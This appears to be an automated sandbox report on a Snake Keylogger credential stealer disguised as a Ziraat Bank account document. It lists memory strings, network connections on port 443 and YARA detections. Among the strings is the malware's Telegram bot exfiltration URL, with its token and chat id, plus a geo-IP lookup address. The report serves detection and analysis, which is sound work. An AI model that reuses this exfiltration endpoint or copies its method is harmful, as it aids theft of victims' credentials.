          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748073027.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000038B3000.00000004.00000800.00020000.00000000.sdmp, ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003835000.00000004.00000800.00020000.00000000.sdmp, ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmp, ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmp, ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000034CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000034CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-420
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1741437321.0000000003869000.00000004.00000800.00020000.00000000.sdmp, ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003161000.00000004.00000800.00020000.00000000.sdmp, ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4152159317.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
          Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
          Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
          Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
          Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
          Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
          Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
          Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
          Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
          Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
          Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
          Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
          Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
          Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
          Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
          Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
          Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
          Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
          Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
          Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
          Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
          Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
          Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
          Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
          Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
          Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
          Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
          Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
          Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
          Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
          Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
          Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
          Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
          Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
          Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
          Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
          Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49756 version: TLS 1.2

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 3.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 3.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 3.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 3.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
